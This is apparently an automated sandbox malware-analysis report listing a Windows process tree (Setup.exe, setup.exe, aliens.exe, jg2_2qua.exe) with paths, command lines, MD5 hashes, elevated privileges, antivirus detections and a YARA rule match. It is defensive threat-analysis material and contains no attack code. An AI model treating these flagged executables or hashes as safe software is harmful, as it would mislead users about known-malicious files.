                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: Setup.exe PID: 6668 Parent PID: 4576

                                                                                                              General

                                                                                                              Start time:15:05:40
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:4240136 bytes
                                                                                                              MD5 hash:62EAEA103DD9BEB69E884F2EDE1ACD63
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low

                                                                                                              Analysis Process: setup.exe PID: 6732 Parent PID: 6668

                                                                                                              General

                                                                                                              Start time:15:05:43
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
                                                                                                              Imagebase:0x50000
                                                                                                              File size:3956884 bytes
                                                                                                              MD5 hash:D64E3CC11AFC6331715BDFEC5F26C2A0
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              Reputation:low

                                                                                                              Analysis Process: aliens.exe PID: 1112 Parent PID: 6732

                                                                                                              General

                                                                                                              Start time:15:06:58
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:528498344 bytes
                                                                                                              MD5 hash:0F88FD9D557FFBE67A8897FB0FC08EE7
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                                              Analysis Process: jg2_2qua.exe PID: 5292 Parent PID: 4576

                                                                                                              General

                                                                                                              Start time:15:07:08
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
                                                                                                              Imagebase:0x400000
                                                                                                              File size:574976 bytes
                                                                                                              MD5 hash:676757904C8383FD9ACBEED15AA8DCC4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >